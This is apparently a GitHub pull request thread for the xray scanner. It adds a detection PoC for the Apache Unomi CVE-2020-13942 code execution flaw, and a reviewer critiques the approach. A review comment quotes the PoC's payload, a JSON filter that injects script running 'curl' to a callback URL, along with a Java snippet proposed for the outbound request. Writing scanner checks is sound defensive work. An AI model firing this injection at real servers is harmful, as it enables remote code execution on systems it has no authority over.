add poc apache unomi cve-2020-13942
chaitin/xray pull request #940
Opened 2020-11-21 21:01 UTC by moonD4rk

----------

## 本 poc 是检测什么漏洞的
apache unomi cve-2020-13942 任意代码执行漏洞

## 测试环境

https://hub.docker.com/r/apache/unomi

## 备注

<img width="802" alt="Screen Shot 2020-11-22 at 05 00 45" src="https://user-images.githubusercontent.com/24284231/99887478-b3909d80-2c7f-11eb-87d8-5b108e2defcf.png">

2020-11-21 21:05 UTC, moonD4rk commented
sorry，提交了才看到2小时前 P 牛已把 Docker 环境集成到 vulhub 里了。

2020-11-24 08:00 UTC, zema1 requested changes

2020-11-24 08:00 UTC, zema1 commented on pocs/apache-unomi-cve-2020-13942-rce.yml
> +      {"filters":[{"id":"{{r1}}","filters":[{"condition":{"parameterValues":{"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"curl {{reverseURL}}\");"},"type":"profilePropertyCondition"}}]}],"s
都能执行任意代码了 就不要用 curl 之类执行命令了。 比较理想的是想办法回显，次之可以用 java 自带的请求库，比如:

```java
URLConnection conn = new URL(url).openConnection(); 
conn.setConnectTimeout(5000);
conn.setReadTimeout(5000);
conn.getContent();
```

建议再研究下

2021-01-07 08:07 UTC, zema1 commented
没有后续了，有进展可以重新开 pr

2021-01-07 08:07 UTC, closed without merging